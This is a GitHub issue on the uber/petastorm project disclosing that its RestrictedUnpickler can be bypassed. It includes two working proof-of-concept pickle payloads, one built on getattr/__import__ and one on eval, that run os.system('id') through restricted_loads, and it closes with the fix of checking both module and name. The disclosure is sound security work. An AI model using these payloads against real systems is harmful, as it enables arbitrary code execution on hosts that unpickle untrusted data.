uber / petastorm

Petastorm library enables single machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as Tensorflow, Pytorch, and PySpark and can be used from pure Python code.
Apache License 2.0
1.8k stars 284 forks source link

`RestrictedUnpickler` is Bypassable #741

Open splitline opened 2 years ago

splitline commented 2 years ago

TL;DR

The implementation of RestrictedUnpickler in here is bypassable.

https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L34-L48

How to Bypass (PoC)

Tested on Python 3.10, might work on other Python 3 versions too.

Basically, it just allows the following modules to import: https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L22-L31

and didn't check the name value at all, so we can still import some dangerous functions.

Now, I'll try to generate the pickle bytecode using my toy compiler. Exploits should execute code equivalent to __import__('os').system('id').

Let's take __builtin__ as an example:

[Exploit 0x01] We can combine builtins.__import__ and builtins.getattr to import arbitrary dangerous functions.

from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N.')

Bytecode is generated by: python pickora.py -c '__import__("os").system("id")'.

[Exploit 0x2] We can just use builtins.eval or builtins.exec to execute arbitrary Python code

from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x956\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x04eval\x93\x8c\x1d__import__("os").system("id")\x85R1N.')

Bytecode is generated by: python pickora.py -c "eval('__import__(\"os\").system(\"id\")')".

The Proper Way?

The correct way to restrict globals is restricting both module and name in find_class at the same time, just like what the documet do.